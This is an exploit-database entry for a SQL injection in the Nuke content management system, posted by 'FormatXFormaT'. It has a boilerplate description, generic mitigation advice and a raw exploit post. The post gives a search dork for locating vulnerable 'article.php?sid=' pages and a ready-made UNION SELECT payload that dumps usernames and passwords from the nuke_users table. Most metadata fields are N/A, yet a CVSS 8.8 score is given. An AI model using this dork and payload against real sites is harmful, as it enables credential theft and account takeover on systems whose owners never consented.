Nuke Remote SQL Injection Vulnerability

vendor:

N/A

by:

FormatXFormaT

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Nuke Remote SQL Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL commands into a vulnerable web application. The attacker can use the SQL injection vulnerability to gain access to sensitive data stored in the database, such as usernames and passwords. The exploit involves using a specially crafted SQL query to bypass authentication and gain access to the database. The attacker can then use the data to gain access to other parts of the system or to launch further attacks.

Mitigation:

To mitigate SQL injection vulnerabilities, input validation should be used to ensure that user-supplied data is properly sanitized. Additionally, parameterized queries should be used to prevent malicious SQL code from being executed. Finally, web application firewalls can be used to detect and block malicious SQL queries.

Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Nuke Remote SQL Injection Vulnerability

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Found: FormatXFormaT
contact: hun4r@yahoo.com
Forum: Tkurd.com

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Dork:
article.php?sid=

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
/**/union/**/all/**/select/**/1,2,3,4,concat(uname,0x3e,pass),6,7,8,9,10,11+from+nuke_users--

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Thanx: Sa3id , Angry-Boy , Neo , All Tkurd Memebers.

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=